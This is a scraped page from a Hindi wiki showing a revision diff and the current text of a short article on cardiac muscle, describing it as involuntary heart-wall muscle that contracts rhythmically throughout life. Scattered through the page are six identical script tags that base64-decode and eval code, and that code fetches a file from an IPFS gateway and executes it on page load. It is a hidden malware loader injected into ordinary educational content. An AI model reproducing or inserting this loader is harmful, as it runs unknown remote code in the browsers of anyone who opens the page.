Difference between revisions of "हृदय पेशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Cardiac Muscles) '''{{PAGENAME}}''' अधिकांश जीव जंतुओं के शरीर का आवश्यक अंग हैं। इस लेख में [[मानव शरीर]] से संबंधित उल्लेख है। ये [[हृदय]] की दीवारों में पायी जाने वाली [[अनैच्छिक माँसपेशियाँ|नैच्छिक पेशियाँ]] होती हैं। इनमें ऐच्छिक पेशियों के समान आड़ी धारियाँ होती हैं। अतः पेशी तन्तु शाखान्वित तथा एककेन्द्रकीय होते हैं।  
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Cardiac Muscle) '''{{PAGENAME}}''' [[हृदय]] की दीवारों में पायी जाने वाली [[अनैच्छिक माँसपेशी|अनैच्छिक पेशियाँ]] होती हैं। अतः पेशी तन्तु शाखान्वित तथा एककेन्द्रकीय होते हैं। इस लेख में केवल [[मानव शरीर]] से संबंधित उल्लेख है।
 
==क्रियाविधि==
 
==क्रियाविधि==
 
हृदय पेशियाँ जीवन–पर्यन्त बिना रुके, बिना थके लय के साथ संकुचित एवं शिथलित होकर गति करती रहती हैं। जिसके फलस्वरूप शरीर में निरन्तर रक्त परिसंचरण होता रहता है।
 
हृदय पेशियाँ जीवन–पर्यन्त बिना रुके, बिना थके लय के साथ संकुचित एवं शिथलित होकर गति करती रहती हैं। जिसके फलस्वरूप शरीर में निरन्तर रक्त परिसंचरण होता रहता है।
Line 12: Line 12:
 
}}
 
}}
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:42, 1 May 2011

(aangrezi:Cardiac Muscle) hriday peshi hriday ki divaroan mean payi jane vali anaichchhik peshiyaan hoti haian. atah peshi tantu shakhanvit tatha ekakendrakiy hote haian. is lekh mean keval manav sharir se sanbandhit ullekh hai.

kriyavidhi

hriday peshiyaan jivan–paryant bina ruke, bina thake lay ke sath sankuchit evan shithalit hokar gati karati rahati haian. jisake phalasvaroop sharir mean nirantar rakt parisancharan hota rahata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>